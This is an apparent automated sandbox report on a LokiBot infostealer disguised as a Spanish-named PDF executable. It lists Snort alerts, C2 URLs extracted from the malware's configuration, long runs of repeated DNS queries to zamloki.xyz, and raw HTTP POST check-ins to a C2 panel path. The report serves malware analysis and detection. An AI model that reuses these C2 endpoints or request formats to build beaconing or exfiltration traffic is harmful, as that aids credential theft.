                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49867 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49868 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49868 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49868 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49869 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49869 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49869 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49870 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49870 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49870 -> 104.21.6.222:80
                C2 URLs / IPs found in malware configurationShow sources
                Source: Malware configuration extractorURLs: http://kbfvzoboss.bid/alien/fre.php
                Source: Malware configuration extractorURLs: http://alphastand.trade/alien/fre.php
                Source: Malware configuration extractorURLs: http://alphastand.win/alien/fre.php
                Source: Malware configuration extractorURLs: http://alphastand.top/alien/fre.php
                Source: Malware configuration extractorURLs: https://zamloki.xyz/des/co/tox.php
                Performs DNS queries to domains with low reputationShow sources
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
                Source: DNS query: zamloki.xyz
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
                Source: DNS query: zamloki.xyz
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeDNS query: zamloki.xyz
                Source: DNS query: zamloki.xyz
                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 190Connection: close
                Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 190Connection: close
                Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /des/co/tox.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: zamloki.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A3C8092Content-Length: 163Connection: close
